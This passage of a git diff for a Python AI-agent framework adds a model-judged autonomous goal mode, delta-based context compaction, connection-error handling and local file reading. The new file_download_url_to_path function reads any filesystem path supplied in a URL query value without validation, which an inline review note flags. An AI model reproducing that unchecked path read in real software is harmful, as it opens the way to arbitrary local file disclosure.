+        return str(answer or "").strip()
+    cleaned = (str(item).strip() for item in answer)
+    return ", ".join(piece for piece in cleaned if piece)
+
+
+def _build_clarification(
+    questions: list[dict],
+    answers: list[list[str]],
+    *,
+    message_id: Optional[str] = None,
+    call_id: Optional[str] = None,
+) -> Optional[GoalClarification]:
+    """Pair questions with their answers and build a ``GoalClarification``.
+
+    Answers are matched to questions by index. Pairs where both sides are
+    blank are skipped; a blank question becomes ``"Question N"`` and a blank
+    answer becomes ``"Unanswered"``. Returns ``None`` when nothing remains.
+    The ``text`` field goes through ``_truncate_text``, which also collapses
+    the newlines between pairs into spaces.
+    """
+    pairs: list[tuple[str, str]] = []
+    for position, question in enumerate(questions):
+        prompt_text = str(question.get("question") or "").strip()
+        reply_text = _format_answer(answers[position] if position < len(answers) else [])
+        if not (prompt_text or reply_text):
+            continue
+        prompt_text = prompt_text or f"Question {position + 1}"
+        reply_text = reply_text or "Unanswered"
+        pairs.append((prompt_text, reply_text))
+
+    if not pairs:
+        return None
+
+    rendered = "\n\n".join(f'Q: {asked}\nA: {replied}' for asked, replied in pairs)
+    return GoalClarification(
+        answers=[
+            GoalClarificationAnswer(question=asked, answer=replied)
+            for asked, replied in pairs
+        ],
+        text=_truncate_text(rendered, GOAL_CLARIFICATION_MAX_CHARS),
+        message_id=message_id,
+        call_id=call_id,
+    )
+
+
+def _extract_json_object(text: str) -> dict:
+    """Parse ``text`` as JSON and require the result to be an object.
+
+    Raises:
+        ValueError: if the text is empty, is not valid JSON, or decodes to
+            something other than a dict.
+    """
+    stripped = (text or "").strip()
+    if not stripped:
+        raise ValueError("empty judge response")
+
+    try:
+        parsed = json.loads(stripped)
+    except json.JSONDecodeError as exc:
+        raise ValueError(f"judge response was not strict JSON: {_trim_reason(stripped)!r}") from exc
+
+    if isinstance(parsed, dict):
+        return parsed
+    raise ValueError("judge response is not a JSON object")
+
+
+async def judge_goal_with_model(
+    objective: str,
+    last_response: str,
+    *,
+    provider_id: str,
+    model_id: str,
+    initial_clarification: Optional[GoalClarification] = None,
+) -> tuple[GoalVerdict, str]:
+    """Hermes-style model judge using the active session provider/model.
+
+    Sends the goal (plus any initial clarification) and the tail of the
+    latest assistant response to the model and parses its JSON verdict.
+
+    Returns:
+        ``(verdict, reason)`` where ``verdict`` is one of ``complete``,
+        ``blocked``, ``waiting`` or ``continue``.
+
+    Raises:
+        RuntimeError: if the provider cannot be found.
+        ValueError: if the reply is not a JSON object or carries an unknown verdict.
+    """
+    provider = Provider.get(provider_id)
+    if provider is None:
+        raise RuntimeError(f"provider not found: {provider_id}")
+
+    # Work on a copy so the dict returned by build_provider_options is not mutated.
+    provider_options = dict(build_provider_options(provider_id, model_id) or {})
+    # Drop every option that is also passed explicitly below; a duplicate
+    # keyword would make the call raise TypeError before reaching the provider.
+    for reserved in ("model_id", "messages", "max_tokens", "temperature"):
+        provider_options.pop(reserved, None)
+
+    response = await provider.chat(
+        model_id=model_id,
+        messages=[
+            ChatMessage(role="system", content=_MODEL_JUDGE_SYSTEM_PROMPT),
+            ChatMessage(
+                role="user",
+                content=(
+                    f"Goal:\n{_format_goal_context(objective, initial_clarification)}\n\n"
+                    "Latest assistant final response (truncated to the last 4KB):\n"
+                    f"{_judge_input(last_response)}"
+                ),
+            ),
+        ],
+        **provider_options,
+        max_tokens=JUDGE_MAX_TOKENS,
+        temperature=0,
+    )
+
+    payload = _extract_json_object(response.content)
+    verdict = str(payload.get("verdict") or "").strip().lower()
+    reason = _trim_reason(str(payload.get("reason") or ""))
+    if verdict not in {"complete", "blocked", "waiting", "continue"}:
+        raise ValueError("judge JSON field 'verdict' must be one of complete, blocked, waiting, continue")
+    if not reason:
+        reason = "model judge returned no reason"
+
+    return verdict, reason
+
+
+class GoalManager:
+    """Stores per-session goal state and decides whether to keep working on it."""
+
+    @classmethod
+    async def get(cls, session_id: str) -> Optional[GoalState]:
+        """Load the session's goal; ``None`` when missing, unreadable or invalid."""
+        try:
+            stored = await Storage.get(_goal_key(session_id))
+        except Exception as exc:
+            log.warn("goal.get.error", {"session_id": session_id, "error": str(exc)})
+            return None
+        if stored:
+            try:
+                return GoalState(**stored)
+            except Exception as exc:
+                log.warn("goal.get.invalid", {"session_id": session_id, "error": str(exc)})
+        return None
+
+    @classmethod
+    async def save(cls, session_id: str, state: GoalState) -> GoalState:
+        """Refresh ``updated_at``, persist ``state`` and return it."""
+        state.updated_at = _now()
+        storage_key = _goal_key(session_id)
+        payload = state.model_dump(exclude_none=True)
+        await Storage.set(storage_key, payload, "goal")
+        return state
+
+    @classmethod
+    async def clear(cls, session_id: str) -> bool:
+        """Delete the session's goal; returns ``False`` if the delete raises."""
+        try:
+            deleted = await Storage.delete(_goal_key(session_id))
+        except Exception as exc:
+            log.warn("goal.clear.error", {"session_id": session_id, "error": str(exc)})
+            return False
+        return deleted
+
+    @classmethod
+    async def set_goal(
+        cls,
+        session_id: str,
+        objective: str,
+        *,
+        max_turns: int = DEFAULT_GOAL_MAX_TURNS,
+    ) -> GoalState:
+        """Create and persist a fresh active goal, replacing any stored one.
+
+        A non-positive ``max_turns`` falls back to the default budget.
+
+        Raises:
+            ValueError: if ``objective`` is empty after stripping.
+        """
+        cleaned = (objective or "").strip()
+        if not cleaned:
+            raise ValueError("goal text is empty")
+        turn_budget = max_turns if max_turns > 0 else DEFAULT_GOAL_MAX_TURNS
+        fresh_state = GoalState(
+            objective=cleaned,
+            status="active",
+            turns_used=0,
+            max_turns=turn_budget,
+        )
+        return await cls.save(session_id, fresh_state)
+
+    @classmethod
+    async def record_initial_clarification(
+        cls,
+        session_id: str,
+        questions: list[dict],
+        answers: list[list[str]],
+        *,
+        message_id: Optional[str] = None,
+        call_id: Optional[str] = None,
+    ) -> Optional[GoalState]:
+        """Store the first clarification for an active goal.
+
+        Nothing is written when there is no goal, the goal is not active, a
+        clarification is already stored, or the questions and answers are all
+        blank; in those cases the current state (possibly ``None``) is returned.
+        """
+        state = await cls.get(session_id)
+        accepts_clarification = (
+            state is not None
+            and state.status == "active"
+            and state.initial_clarification is None
+        )
+        if not accepts_clarification:
+            return state
+
+        clarification = _build_clarification(
+            questions,
+            answers,
+            message_id=message_id,
+            call_id=call_id,
+        )
+        if clarification is None:
+            return state
+
+        state.initial_clarification = clarification
+        return await cls.save(session_id, state)
+
+    @classmethod
+    def goal_prompt(cls, objective: str) -> str:
+        """Build the prompt text that introduces goal mode for ``objective``."""
+        header = f"[Goal mode]\nActive goal: {objective}\n\n"
+        guidance = (
+            "If the active goal is ambiguous or underspecified, ask the user a "
+            "clarifying question using the question tool and wait for the answer "
+            "instead of continuing autonomously. "
+            "Work toward the active goal. Continue taking concrete steps until the goal "
+            "is complete or blocked. In your final response, make the current outcome "
+            "clear with evidence of completed work or the specific blocker."
+        )
+        return header + guidance
+
+    @classmethod
+    def continuation_prompt(cls, state: GoalState, reason: str) -> str:
+        """Build the prompt for the next autonomous turn toward the goal.
+
+        An empty ``reason`` is replaced with a generic one, and the stored
+        clarification text is included when it is non-blank.
+        """
+        why = reason or "goal is still active"
+        recorded = state.initial_clarification
+        clarification = ""
+        if recorded is not None and recorded.text.strip():
+            clarification = f"\nInitial user clarification:\n{recorded.text}\n"
+        return (
+            "[Continuing toward active goal]\n"
+            f"Goal: {state.objective}\n"
+            f"{clarification}"
+            f"Reason to continue: {why}\n\n"
+            "Take the next concrete step. If the goal is complete or blocked, make "
+            "that outcome clear with evidence or the specific blocker."
+        )
+
+    @classmethod
+    async def evaluate_after_turn(
+        cls,
+        session_id: str,
+        last_response: str,
+        *,
+        pending_user_input: bool = False,
+        provider_id: Optional[str] = None,
+        model_id: Optional[str] = None,
+    ) -> GoalDecision:
+        """Judge the finished turn and decide whether to continue autonomously.
+
+        Without an active goal the verdict is ``inactive`` and nothing is
+        saved. Otherwise the turn counter is incremented, a verdict is
+        obtained, and the state is persisted. The verdict is ``waiting``
+        whenever user input is pending, no provider/model is given, or the
+        judge call fails. A ``continue`` verdict that reaches the turn budget
+        pauses the goal instead of continuing.
+        """
+        state = await cls.get(session_id)
+        if state is None:
+            return GoalDecision(status=None, verdict="inactive", objective=None)
+        if state.status != "active":
+            return GoalDecision(
+                status=state.status,
+                verdict="inactive",
+                objective=state.objective,
+            )
+
+        state.turns_used += 1
+        if pending_user_input:
+            verdict, reason = "waiting", "session has a pending user question"
+        elif not (provider_id and model_id):
+            verdict = "waiting"
+            reason = "goal judge unavailable; waiting instead of continuing autonomously"
+        else:
+            try:
+                verdict, reason = await judge_goal_with_model(
+                    state.objective,
+                    last_response,
+                    provider_id=provider_id,
+                    model_id=model_id,
+                    initial_clarification=state.initial_clarification,
+                )
+            except Exception as exc:
+                log.warn("goal.model_judge.failed", {
+                    "session_id": session_id,
+                    "provider_id": provider_id,
+                    "model_id": model_id,
+                    "error": str(exc),
+                })
+                verdict = "waiting"
+                reason = "goal judge failed; waiting instead of continuing autonomously"
+        state.last_verdict = verdict
+        state.last_reason = reason
+
+        # Verdicts that end the autonomous loop; "waiting" leaves the status untouched.
+        status_for_verdict = {"complete": "completed", "blocked": "blocked"}
+        if verdict in ("complete", "blocked", "waiting"):
+            if verdict in status_for_verdict:
+                state.status = status_for_verdict[verdict]
+            await cls.save(session_id, state)
+            return GoalDecision(
+                status=state.status,
+                verdict=verdict,
+                reason=reason,
+                objective=state.objective,
+            )
+
+        budget_spent = state.turns_used >= state.max_turns
+        if budget_spent:
+            state.status = "paused"
+            state.paused_reason = f"turn budget exhausted ({state.turns_used}/{state.max_turns})"
+        await cls.save(session_id, state)
+
+        if budget_spent:
+            return GoalDecision(
+                status=state.status,
+                verdict="continue",
+                reason=state.paused_reason,
+                objective=state.objective,
+            )
+        return GoalDecision(
+            status=state.status,
+            verdict="continue",
+            should_continue=True,
+            continuation_prompt=cls.continuation_prompt(state, reason),
+            reason=reason,
+            objective=state.objective,
+        )
diff --git a/flocks/session/interaction_queue.py b/flocks/session/interaction_queue.py
index 92ab2242c..b92464f9e 100644
--- a/flocks/session/interaction_queue.py
+++ b/flocks/session/interaction_queue.py
@@ -29,6 +29,7 @@ class QueuedPrompt(BaseModel):
     agent: Optional[str] = None
     model: Optional[Dict[str, Any]] = None
     variant: Optional[str] = None
+    display_text: Optional[str] = None
     messageID: Optional[str] = None
     noReply: Optional[bool] = None
     mockReply: Optional[str] = None
@@ -62,6 +63,7 @@ async def enqueue(
         agent: Optional[str] = None,
         model: Optional[Dict[str, Any]] = None,
         variant: Optional[str] = None,
+        display_text: Optional[str] = None,
         message_id: Optional[str] = None,
         no_reply: Optional[bool] = None,
         mock_reply: Optional[str] = None,
@@ -79,6 +81,7 @@ async def enqueue(
                 agent=agent,
                 model=dict(model) if isinstance(model, dict) else model,
                 variant=variant,
+                display_text=display_text,
                 messageID=message_id,
                 noReply=no_reply,
                 mockReply=mock_reply,
@@ -114,6 +117,7 @@ async def update_text(cls, session_id: str, item_id: str, text: str) -> QueuedPr
                 parts.insert(0, {"type": "text", "text": text})
 
             item.parts = parts
+            item.display_text = None
             item.updatedAt = int(time.time() * 1000)
             return item.model_copy(deep=True)
 
diff --git a/flocks/session/lifecycle/compaction/compaction.py b/flocks/session/lifecycle/compaction/compaction.py
index 5fcb10e55..7e614b6d8 100644
--- a/flocks/session/lifecycle/compaction/compaction.py
+++ b/flocks/session/lifecycle/compaction/compaction.py
@@ -16,15 +16,6 @@
 from dataclasses import dataclass, field
 from typing import Awaitable, Callable, List, Optional, Dict, Any, Literal
 
-# Optional progress sink injected by the route layer so the front-end can
-# render a multi-stage "Compacting..." panel instead of a 30–60 s opaque
-# spinner.  Kept dependency-free: the callback signature is just
-# ``(stage, data) -> Awaitable[None]``.  Producers MUST tolerate a
-# ``None`` callback (silent / no-op) and any exception raised by the
-# sink — progress reporting is observability, never a correctness
-# contract for compaction itself.  See ``_emit_progress`` below.
-ProgressCallback = Callable[[str, Dict[str, Any]], Awaitable[None]]
-
 from flocks.utils.log import Log
 from flocks.session.prompt import SessionPrompt
 from .policy import CompactionPolicy
@@ -38,6 +29,15 @@
 
 log = Log.create(service="session.compaction")
 
+# Optional progress sink injected by the route layer so the front-end can
+# render a multi-stage "Compacting..." panel instead of a 30–60 s opaque
+# spinner.  Kept dependency-free: the callback signature is just
+# ``(stage, data) -> Awaitable[None]``.  Producers MUST tolerate a
+# ``None`` callback (silent / no-op) and any exception raised by the
+# sink — progress reporting is observability, never a correctness
+# contract for compaction itself.  See ``_emit_progress`` below.
+ProgressCallback = Callable[[str, Dict[str, Any]], Awaitable[None]]
+
 
 # ---------------------------------------------------------------------------
 # Iterative summary state (E1 — see docs/design/context-compaction-v2.md §E1)
@@ -1024,6 +1024,7 @@ async def process(
         # caller supplied a custom prompt (e.g. ``/compact <focus>``),
         # which we honour verbatim.  Every Nth compaction the cached
         # summary is dropped to force a full rebuild and prevent drift.
+        force_full_rebuild = False
         if not custom_prompt:
             previous_summary, prior_compaction_count = _get_iterative_summary_state(session_id)
             if _should_force_full_rebuild(prior_compaction_count):
@@ -1032,6 +1033,7 @@ async def process(
                     "compaction_count": prior_compaction_count,
                     "rebuild_interval": ITERATIVE_SUMMARY_REBUILD_INTERVAL,
                 })
+                force_full_rebuild = True
                 previous_summary = None
         else:
             previous_summary, prior_compaction_count = None, 0
@@ -1044,13 +1046,66 @@ async def process(
             log.warn("compaction.process.load_parts_error", {"error": str(e)})
             msgs_with_parts = []
 
+        summary_msgs_with_parts = [
+            msg for msg in msgs_with_parts
+            if not cls._is_compaction_control_message(msg)
+        ]
+        summary_input_mode = "full_active"
+        previous_summary_source = "cache" if previous_summary else "none"
+
+        if not custom_prompt and not force_full_rebuild:
+            latest_summary_idx, persisted_previous_summary = cls._latest_summary_boundary(
+                msgs_with_parts,
+            )
+            if latest_summary_idx >= 0 and persisted_previous_summary:
+                previous_summary = persisted_previous_summary
+                previous_summary_source = "latest_summary_message"
+                delta_msgs = [
+                    msg for msg in msgs_with_parts[latest_summary_idx + 1:]
+                    if not cls._is_summary_message(msg)
+                    and not cls._is_compaction_control_message(msg)
+                ]
+                if not delta_msgs:
+                    log.info("compaction.process.skipped_no_delta", {
+                        "session_id": session_id,
+                        "latest_summary_index": latest_summary_idx,
+                        "with_parts_count": len(msgs_with_parts),
+                    })
+                    await _emit_progress(progress_callback, "load", {
+                        "message_count": 0,
+                        "total_chars": 0,
+                    })
+                    await _emit_progress(progress_callback, "complete", {
+                        "result": "skipped_no_new_messages",
+                    })
+                    history.total_skipped += 1
+                    return "skipped"
+                summary_msgs_with_parts = delta_msgs
+                summary_input_mode = "delta_after_latest_summary"
+
+        if not summary_msgs_with_parts:
+            log.info("compaction.process.skipped_no_summary_input", {
+                "session_id": session_id,
+                "with_parts_count": len(msgs_with_parts),
+                "input_mode": summary_input_mode,
+            })
+            await _emit_progress(progress_callback, "load", {
+                "message_count": 0,
+                "total_chars": 0,
+            })
+            await _emit_progress(progress_callback, "complete", {
+                "result": "skipped_no_summary_input",
+            })
+            history.total_skipped += 1
+            return "skipped"
+
         # Extract once; keep the original (un-pruned) list for memory flush
         # so daily memory extraction sees the full content density of every
         # turn.  Only the *summary LLM* path gets the hermes-style pruned
         # view — collapsing old tool outputs to a 1-line placeholder is
         # the wrong input for a fact extractor.
         original_chat_messages = cls._extract_chat_messages(
-            msgs_with_parts, ChatMessage, session_id, policy,
+            summary_msgs_with_parts, ChatMessage, session_id, policy,
         )
 
         # Hermes-style pre-prune: MD5 dedup + compress large old messages to
@@ -1065,8 +1120,11 @@ async def process(
             "session_id": session_id,
             "raw_count": len(messages),
             "with_parts_count": len(msgs_with_parts),
+            "summary_with_parts_count": len(summary_msgs_with_parts),
             "chat_messages_count": len(chat_messages),
             "total_chars": loaded_total_chars,
+            "input_mode": summary_input_mode,
+            "previous_summary_source": previous_summary_source,
         })
         await _emit_progress(progress_callback, "load", {
             "message_count": len(chat_messages),
@@ -1503,6 +1561,59 @@ def _strip_tool_content(cls, raw: str, limit: int) -> str:
             + text[-tail_budget:]
         )
 
+    @classmethod
+    def _message_text_from_parts(cls, parts: list) -> str:
+        """Join the non-empty ``text`` of every text/reasoning/thinking part with newlines and strip the result."""
+        text_parts: list[str] = []
+        for part in parts or []:  # tolerate ``parts`` being None
+            ptype = getattr(part, "type", None)
+            if ptype not in ("text", "reasoning", "thinking"):
+                continue  # any other part type contributes nothing
+            text = getattr(part, "text", "") or ""  # a missing or None ``text`` becomes ""
+            if text:
+                text_parts.append(text)
+        return "\n".join(text_parts).strip()
+
+    @classmethod
+    def _is_summary_message(cls, msg_with_parts: Any) -> bool:
+        """Return True for persisted compaction summary messages (``info.finish == "summary"`` or a truthy ``info.summary``)."""
+        info = getattr(msg_with_parts, "info", None)
+        finish = getattr(info, "finish", None)  # a missing ``info`` (None) simply yields None here
+        return finish == "summary" or bool(getattr(info, "summary", None))
+
+    @classmethod
+    def _latest_summary_boundary(cls, msgs_with_parts: list) -> tuple[int, Optional[str]]:
+        """Find the latest summary message and return ``(index, text)``; returns ``(-1, None)`` when there is none."""
+        for idx in range(len(msgs_with_parts) - 1, -1, -1):  # scan from the last element backwards
+            msg = msgs_with_parts[idx]
+            if not cls._is_summary_message(msg):
+                continue
+            summary_text = cls._message_text_from_parts(getattr(msg, "parts", []) or [])
+            return idx, summary_text or None  # an empty summary text is reported as None
+        return -1, None
+
+    @classmethod
+    def _is_compaction_control_message(cls, msg_with_parts: Any) -> bool:
+        """Return True for user messages excluded from summary input: all parts synthetic, a ``compaction`` part, or a ``/compact`` command."""
+        info = getattr(msg_with_parts, "info", None)
+        role = getattr(info, "role", "")
+        if hasattr(role, "value"):  # role may expose ``.value`` (e.g. an enum); compare by that value
+            role = role.value
+        if role != "user":
+            return False
+
+        parts = getattr(msg_with_parts, "parts", []) or []
+        if parts and all(bool(getattr(part, "synthetic", None)) for part in parts):
+            return True  # non-empty message whose every part is flagged synthetic
+        if any(getattr(part, "type", None) == "compaction" for part in parts):
+            return True
+
+        text = cls._message_text_from_parts(parts).strip()
+        if not text:
+            return False
+        first_line = text.splitlines()[0].strip()
+        return first_line == "/compact" or first_line.startswith("/compact ")  # bare command, or command followed by arguments
+
     @classmethod
     def _extract_chat_messages(
         cls,
diff --git a/flocks/session/lifecycle/retry.py b/flocks/session/lifecycle/retry.py
index 82339d6cd..fe6f79c99 100644
--- a/flocks/session/lifecycle/retry.py
+++ b/flocks/session/lifecycle/retry.py
@@ -19,6 +19,20 @@
 RETRY_BACKOFF_FACTOR = 2
 RETRY_MAX_DELAY_NO_HEADERS = 30_000  # 30 seconds
 RETRY_MAX_DELAY = 2_147_483_647  # max 32-bit signed integer
+CONNECTION_ERROR_DISPLAY_MESSAGE = (
+    "Model is unavailable. Please check the provider connection and model configuration."
+)
+CONNECTION_ERROR_PATTERNS = [
+    "connection error",
+    "connection reset",
+    "connection refused",
+    "could not connect",
+    "failed to connect",
+    "api connection",
+    "model unavailable",
+    "model is unavailable",
+    "model not available",
+]
 
 
 class SessionRetry:
@@ -177,7 +191,7 @@ def retryable(error: Dict[str, Any]) -> Optional[str]:
             transient_patterns = [
                 "unavailable", "503", "502",
                 "timeout", "timed out",
-                "connection error", "connection reset", "connection refused",
+                *CONNECTION_ERROR_PATTERNS,
                 "null message", "returned choice with null",
                 "empty streaming response", "empty choices",
             ]
@@ -187,3 +201,13 @@ def retryable(error: Dict[str, Any]) -> Optional[str]:
                 return "Connection or Server Error"
         
         return None
+
+    @staticmethod
+    def is_connection_error(error: Dict[str, Any]) -> bool:
+        """Return True when the error message (``data.message`` first, then ``message``) matches a connection-failure pattern."""
+        data = error.get("data")
+        if not isinstance(data, dict):  # "data" may be absent or explicitly None; never call .get on it then
+            data = {}
+        message = data.get("message") or error.get("message", "")
+        message_lower = message.lower() if isinstance(message, str) else ""  # non-string messages never match
+        return any(pattern in message_lower for pattern in CONNECTION_ERROR_PATTERNS)
diff --git a/flocks/session/runner.py b/flocks/session/runner.py
index df2f11145..22406ce56 100644
--- a/flocks/session/runner.py
+++ b/flocks/session/runner.py
@@ -31,7 +31,7 @@
     DOOM_LOOP_THRESHOLD,
     REPEATED_EXACT_TOOL_CALL_HALT_THRESHOLD,
 )
-from flocks.session.lifecycle.retry import SessionRetry
+from flocks.session.lifecycle.retry import CONNECTION_ERROR_DISPLAY_MESSAGE, SessionRetry
 from flocks.session.lifecycle.compaction import SessionCompaction, CompactionPolicy
 from flocks.session.streaming.stream_processor import StreamProcessor
 from flocks.session.streaming.stream_events import (
@@ -1207,7 +1207,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
         # The two counters are independent: empty-response retries (transient
         # model quirk) and exception retries (API errors) track separately so
         # that one kind of failure doesn't eat the other's budget.
-        MAX_ERROR_RETRIES = 7
+        MAX_ERROR_RETRIES = 3
         MAX_EMPTY_RETRIES = 3
         error_attempt = 0
         empty_attempt = 0
@@ -1366,6 +1366,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
                         "attempt": error_attempt,
                         "delay_ms": delay_ms,
                         "reason": retry_message,
+                        "max_retries": MAX_ERROR_RETRIES,
                     })
                     
                     # Set retry status
@@ -1394,8 +1395,13 @@ async def device_asset_prompt_factory() -> Optional[str]:
                     else:
                         log.error("runner.step.not_retryable", {"error": str(e)})
 
+                    final_error_message = str(e)
+                    if SessionRetry.is_connection_error(error_dict):
+                        final_error_message = CONNECTION_ERROR_DISPLAY_MESSAGE
+                        error_dict["data"]["displayMessage"] = CONNECTION_ERROR_DISPLAY_MESSAGE
+
                     if self.callbacks.on_error:
-                        await self.callbacks.on_error(str(e))
+                        await self.callbacks.on_error(final_error_message)
                     
                     # Update assistant message with error (must be dict, not string)
                     await Message.update(
@@ -1405,7 +1411,7 @@ async def device_asset_prompt_factory() -> Optional[str]:
                         finish="error",
                     )
                     
-                    return StepResult(action="stop", error=str(e))
+                    return StepResult(action="stop", error=final_error_message)
         
         # Aborted
         return StepResult(action="stop", error="Aborted")
@@ -1813,10 +1819,14 @@ def _exception_to_error_dict(self, exception: Exception) -> Dict[str, Any]:
             "rate limit", "too many requests", "429",
             "overloaded", "unavailable", "503", "502",
             "timeout", "timed out", "server error",
-            "connection error", "connection reset", "connection refused",
         ]):
             error_dict["name"] = "APIError"
             error_dict["data"]["isRetryable"] = True
+
+        if SessionRetry.is_connection_error(error_dict):
+            error_dict["name"] = "APIError"
+            error_dict["data"]["isRetryable"] = True
+            error_dict["data"]["displayMessage"] = CONNECTION_ERROR_DISPLAY_MESSAGE
         
         return error_dict
     
diff --git a/flocks/session/session_loop.py b/flocks/session/session_loop.py
index 3423216c7..d09c7a14a 100644
--- a/flocks/session/session_loop.py
+++ b/flocks/session/session_loop.py
@@ -13,6 +13,7 @@
 """
 
 import asyncio
+import inspect
 import time
 from typing import Optional, List, Dict, Any, Callable, Awaitable
 from dataclasses import dataclass, field
@@ -38,6 +39,7 @@
 from flocks.session.lifecycle.compaction.compaction import _get_compaction_history
 from flocks.session.prompt import SessionPrompt
 from flocks.provider.provider import Provider
+from flocks.session.goal import GoalManager
 
 
 log = Log.create(service="session.loop")
@@ -1252,6 +1254,86 @@ async def progress_callback_overflow(stage: str, data: dict) -> None:
                     })
                     continue
 
+                if not step_result.error and last_message is not None:
+                    try:
+                        content_result = Message.get_text_content(last_message)
+                        last_response = (
+                            await content_result
+                            if inspect.isawaitable(content_result)
+                            else content_result
+                        )
+                    except Exception as exc:
+                        log.warn("goal.last_response.error", {
+                            "session_id": ctx.session.id,
+                            "message_id": getattr(last_message, "id", None),
+                            "error": str(exc),
+                        })
+                        last_response = getattr(last_message, "content", "") or ""
+                    pending_user_input = False
+                    try:
+                        from flocks.server.routes.question import has_pending_questions
+
+                        pending_user_input = has_pending_questions(ctx.session.id)
+                    except Exception as exc:
+                        log.warn("goal.pending_question_check.error", {
+                            "session_id": ctx.session.id,
+                            "error": str(exc),
+                        })
+                    goal_decision = await GoalManager.evaluate_after_turn(
+                        ctx.session.id,
+                        str(last_response or ""),
+                        pending_user_input=pending_user_input,
+                        provider_id=ctx.provider_id,
+                        model_id=ctx.model_id,
+                    )
+                    if goal_decision.status in {"completed", "blocked", "paused"} and goal_decision.objective:
+                        await cls._publish_runtime_event(callbacks, "session.goal.updated", {
+                            "sessionID": ctx.session.id,
+                            "status": goal_decision.status,
+                            "objective": goal_decision.objective,
+                            "reason": goal_decision.reason,
+                        })
+                    if goal_decision.should_continue and goal_decision.continuation_prompt:
+                        # Hermes-style goal continuation: append a user-role
+                        # prompt to history so the model continues, while
+                        # marking the part synthetic so UIs do not treat it as
+                        # user-authored text.
+                        goal_user = await Message.create(
+                            session_id=ctx.session.id,
+                            role=MessageRole.USER,
+                            content=goal_decision.continuation_prompt,
+                            agent=last_user.agent if hasattr(last_user, "agent") else ctx.agent_name,
+                            model=last_user.model if hasattr(last_user, "model") else {
+                                "providerID": ctx.provider_id,
+                                "modelID": ctx.model_id,
+                            },
+                            provider=last_user.provider if hasattr(last_user, "provider") else ctx.provider_id,
+                            synthetic=True,
+                            part_metadata={
+                                "goalContinuation": True,
+                                "goalVerdict": goal_decision.verdict,
+                                "goalReason": goal_decision.reason,
+                            },
+                        )
+                        turn_state = set_turn_state(
+                            ctx.session.id,
+                            step=ctx.step,
+                            status="continued",
+                            continue_reason="goal",
+                            queued_message_detected=False,
+                        )
+                        await cls._publish_runtime_event(callbacks, "turn.continued", {
+                            **turn_state.model_dump(by_alias=True),
+                            "goalMessageID": goal_user.id,
+                            "goalVerdict": goal_decision.verdict,
+                        })
+                        log.info("loop.continuing_for_goal", {
+                            "session_id": ctx.session.id,
+                            "goal_message_id": goal_user.id,
+                            "reason": goal_decision.reason,
+                        })
+                        continue
+
                 stop_reason = step_result.error or (getattr(last_message, "finish", None) if last_message else None) or "stop"
                 turn_state = set_turn_state(
                     ctx.session.id,
diff --git a/flocks/session/utils/file_extractor.py b/flocks/session/utils/file_extractor.py
index 5634b4cc0..1c77aa2c2 100644
--- a/flocks/session/utils/file_extractor.py
+++ b/flocks/session/utils/file_extractor.py
@@ -12,30 +12,65 @@
 import logging
 from pathlib import Path
 from typing import Optional
-from urllib.parse import unquote, urlparse
+from urllib.parse import parse_qs, unquote, urlparse
 
 _log = logging.getLogger(__name__)
 
 
-_TEXT_EXTRACTABLE_MIMES = frozenset({
-    "application/json",
-    "application/ld+json",
-    "application/xml",
-    "application/yaml",
-    "application/x-yaml",
-    "application/javascript",
-    "application/x-sh",
-    "application/x-shellscript",
-    "text/markdown",
-    "text/csv",
-})
+_TEXT_EXTRACTABLE_MIMES = frozenset(
+    {
+        "application/json",
+        "application/ld+json",
+        "application/xml",
+        "application/yaml",
+        "application/x-yaml",
+        "application/javascript",
+        "application/x-sh",
+        "application/x-shellscript",
+        "text/markdown",
+        "text/csv",
+    }
+)
 
 _DEFAULT_MAX_CHARS = 12_000
 _DEFAULT_MAX_PAGES = 20
+_LOCAL_DOWNLOAD_HOSTS = frozenset({"localhost", "127.0.0.1", "::1"})
+
+
+def file_url_to_path(url: str) -> str:
+    """Convert a ``file://`` URL to a local filesystem path string (percent-decoded)."""
+    parsed = urlparse(url)
+    path = unquote(parsed.path)
+    if len(path) >= 3 and path[0] == "/" and path[2] == ":" and path[1].isalpha():
+        path = path[1:]  # "/C:/dir" -> "C:/dir": drop the slash in front of a drive letter
+    if parsed.netloc and parsed.netloc.lower() != "localhost":
+        path = f"//{parsed.netloc}{path}"  # keep a non-localhost host as a "//host/path" prefix
+    return path
+
+
+def file_download_url_to_path(url: str) -> Optional[str]:
+    """Return the first ``path`` query value of a ``/api/file/download`` URL, or None when the URL does not qualify."""
+    parsed = urlparse(url)
+    if parsed.hostname and parsed.hostname not in _LOCAL_DOWNLOAD_HOSTS:
+        return None  # an explicit host must be a local one; URLs without a host pass this check
+    if parsed.path != "/api/file/download":
+        return None
+    path_values = parse_qs(parsed.query).get("path")
+    if not path_values:
+        return None  # no usable ``path`` parameter in the query string
+    return path_values[0]  # NOTE(review): value comes straight from the URL query — confirm callers only pass trusted URLs
+
+
+def _read_local_path(path: str) -> Optional[bytes]:  # best-effort read: file bytes on success, None on any error
+    try:
+        return Path(path).read_bytes()
+    except Exception as e:
+        _log.debug("read_file_part_bytes: file read failed: %s (path=%s)", e, path)  # failure is only logged at debug level
+        return None
 
 
 def read_file_part_bytes(url: str) -> Optional[bytes]:
-    """Read raw bytes from a data URI or file:// URL.
+    """Read raw bytes from a data URI, file:// URL, or local download URL.
 
     Returns None when the URL is empty, has an unsupported scheme, or the
     underlying read fails.
@@ -50,12 +85,10 @@ def read_file_part_bytes(url: str) -> Optional[bytes]:
             _log.debug("read_file_part_bytes: data URI decode failed: %s", e)
             return None
     if url.startswith("file://"):
-        parsed = urlparse(url)
-        try:
-            return Path(unquote(parsed.path)).read_bytes()
-        except Exception as e:
-            _log.debug("read_file_part_bytes: file read failed: %s (path=%s)", e, parsed.path)
-            return None
+        return _read_local_path(file_url_to_path(url))
+    path = file_download_url_to_path(url)
+    if path:
+        return _read_local_path(path)
     return None
 
 
@@ -64,9 +97,7 @@ def is_text_extractable_mime(mime: str) -> bool:
     return mime.startswith("text/") or mime in _TEXT_EXTRACTABLE_MIMES
 
 
-def truncate_extracted_text(
-    text: str, max_chars: int = _DEFAULT_MAX_CHARS
-) -> tuple[str, bool]:
+def truncate_extracted_text(text: str, max_chars: int = _DEFAULT_MAX_CHARS) -> tuple[str, bool]:
     """Strip and truncate *text* to *max_chars*.
 
     Returns ``(truncated_text, was_truncated)``.
@@ -141,9 +172,11 @@ def extract_file_text(
 
 
 __all__ = [
-    "read_file_part_bytes",
-    "is_text_extractable_mime",
-    "truncate_extracted_text",
     "extract_pdf_text_from_bytes",
     "extract_file_text",
+    "file_download_url_to_path",
+    "file_url_to_path",
+    "is_text_extractable_mime",
